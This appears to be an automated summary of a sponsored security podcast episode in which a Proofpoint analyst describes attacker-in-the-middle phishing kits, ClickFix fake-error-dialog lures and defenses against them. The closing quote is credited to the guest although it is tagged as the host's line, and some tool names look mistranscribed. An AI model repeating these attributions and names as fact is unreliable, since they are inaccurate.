Risky Business News - Episode Summary
Title: Sponsored: Proofpoint on the Rise of ClickFix Attacks
Host: Katalin Campano
Guest: Selena Larson, Senior Threat Intelligence Analyst at Proofpoint
Release Date: December 8, 2024

Introduction

In this episode of Risky Business News, host Katalin Campano engages in a compelling discussion with Selena Larson, a Senior Threat Intelligence Analyst at Proofpoint. Sponsored by Proofpoint, the conversation delves into the evolving landscape of phishing attacks, with a particular focus on the rise of ClickFix techniques and the broader implications for cybersecurity.

Attacker-in-the-Middle Phishing

The episode opens with an exploration of attacker-in-the-middle phishing, a sophisticated method where threat actors intercept and manipulate authentication processes to steal sensitive credentials. Katalin references a prior discussion with Jacques Low from Push Security on similar topics, setting the stage for an in-depth analysis.

Selena Larson emphasizes the prevalence of this threat, stating, “[01:04] B: Yeah, it is very prevalent. We see a lot of it in email threat data.” She explains the two main types: reverse proxies and relays. Reverse proxies rewrite legitimate sites in real-time to harvest information, while relays interact with login portals on the backend. Kits such as Mamba and Tycoon, along with services like Evil Proxy and Evil Jinx, are highlighted as common tools used by cybercriminals to facilitate these attacks.

Larson notes, “[01:04]... most phishing as a service solutions are capable of defeating these MFA controls,” underscoring the adaptability of attackers in overcoming security measures like Multi-Factor Authentication (MFA).

Monetization of Stolen Credentials

Katalin raises an insightful question about the monetization of stolen credentials, pondering whether data from attacker-in-the-middle phishing ends up in credential shops. She observes, “[02:51]... most of the stuff on credential stores actually comes from info stealers.”

Larson responds, “[03:19] B: So we've actually never done that. Proofpoint doesn't really monitor the sort of leak sites...,” indicating that while Proofpoint tracks phishing kits and the information they target, they do not specifically monitor credential leakage on resale platforms. She elaborates on the complexities of monetizing MFA tokens due to their temporary nature, contrasting them with more valuable data like usernames and passwords.

However, Larson acknowledges the potential for stolen credentials to facilitate a variety of malicious activities, including business email compromise (BEC) and network access: “[03:31]... usernames and passwords could be sold and used... everything from follow on phishing to gain further access to a network...”

Rise of ClickFix Attacks

The conversation shifts to a rising trend in threat intelligence: ClickFix attacks. Katalin introduces the topic, and Larson provides a comprehensive overview.

Selena Larson describes ClickFix as a social engineering technique that employs fake dialogue boxes mimicking legitimate error messages or fix prompts. These deceptive prompts trick users into copying and executing malicious PowerShell commands, thereby installing malware. She explains, “[05:57] B: Essentially, it is a social engineering technique that uses these dialogue boxes... trick people into copying, pasting, and running malicious content on their computer.”

Larson highlights the simplicity and effectiveness of ClickFix, noting its prevalence across various threat actors. She cites the rapid adoption following its public release, “[05:57]... when this tool was released back in mid September, we started seeing it in email threat data just days later.” This underscores the technique’s adaptability and appeal within the cybercriminal community.

Defense Strategies Against ClickFix

Addressing defense mechanisms, Katalin suggests limiting PowerShell execution to mitigate ClickFix threats. Larson concurs, emphasizing a multi-faceted defense approach:

“[08:31] B: ...restricting access and execution of PowerShell on hosts can definitely prevent this.”

She further advocates for user awareness and training, pointing out that informed users are less likely to fall victim to such social engineering tactics. Larson notes the importance of recognizing the legitimacy of malware delivery methods: “[08:31]... having users be aware of this... these dialogue boxes look very legitimate.”

Origins and Evolution of ClickFix

Katalin inquires about the origins of the ClickFix technique, to which Larson responds by tracing it as an evolution of threat actor tactics in response to enhanced security measures like MFA.

“[09:28] B: I feel like the click fix technique is an evolution of tactics that we're seeing from threat actors... being very creative and trying new ways to infect users.”

Larson illustrates how threat actors continuously adapt, moving from MFA bypassing to leveraging social engineering methods that grant users a false sense of control, ultimately leading to malware installation.

She also mentions the diverse adoption of ClickFix across various threat levels, including Advanced Persistent Threats (APTs) like APT28, showcasing its broad applicability and effectiveness.

Shift Towards Enhanced Social Engineering

The discussion transitions to a broader shift in cyberattack strategies, moving from traditional methods to more sophisticated social engineering and human-centric interactions.

Katalin posits, “[11:13] A: So you could see a possible shift towards more social engineering and human interaction compared to classic... That’s basically the future, right?”

Larson agrees, highlighting the trend towards building trust and engaging users in conversation before deploying malicious payloads. She explains, “[11:23] B:... threat actors reach out, have a conversation with somebody... building up a little bit of trust increases the likelihood of interaction on malicious applications.”

Examples include tailored phishing attempts that mimic non-threatening interactions, such as job offer emails that gradually introduce malicious elements: “[12:10] A: Especially the Iranians... [12:12] B:... TA4557 is a threat actor that delivers Morax. They send benign emails about a potential job...”

This strategy reflects a more psychologically nuanced approach, making attacks harder to detect and more convincing.

Conclusion

The episode wraps up with Larson reiterating the importance of adaptability in cybersecurity defenses and the need for continuous user education. The conversation underscores the dynamic nature of cyber threats, emphasizing that as defenses evolve, so too do the tactics of threat actors.

Selena Larson concludes, “[13:02] A: I think it's a great way to end it. Thank you very much.”

Katalin Campano and Selena Larson exchange final remarks, highlighting the critical need for vigilance and proactive measures in combating sophisticated phishing techniques like ClickFix.

Notable Quotes:

• Selena Larson [01:04]: “Yeah, it is very prevalent. We see a lot of it in email threat data.”
• Larson [05:57]: “Essentially, it is a social engineering technique that uses these dialogue boxes... trick people into copying, pasting, and running malicious content on their computer.”
• Larson [08:31]: “Restricting access and execution of PowerShell on hosts can definitely prevent this.”
• Larson [09:28]: “I feel like the click fix technique is an evolution of tactics that we're seeing from threat actors... being very creative and trying new ways to infect users.”
• Larson [11:23]: “Threat actors reach out, have a conversation with somebody... building up a little bit of trust increases the likelihood of interaction on malicious applications.”
• Larson [12:12]: “TA4557 is a threat actor that delivers Morax. They send benign emails about a potential job...”

Key Takeaways

• Attacker-in-the-Middle Phishing is highly prevalent, utilizing reverse proxies and relays to bypass MFA controls.
• ClickFix attacks represent a significant rise in social engineering tactics, leveraging fake fix prompts to deliver malware via PowerShell.
• Defensive strategies should include restricting PowerShell execution and enhancing user awareness through training.
• There is a notable shift towards more sophisticated social engineering and human-centric attack methods, necessitating adaptive defenses.

For those interested in the latest cybersecurity threats and defense strategies, this episode of Risky Business News offers invaluable insights from a leading expert in the field.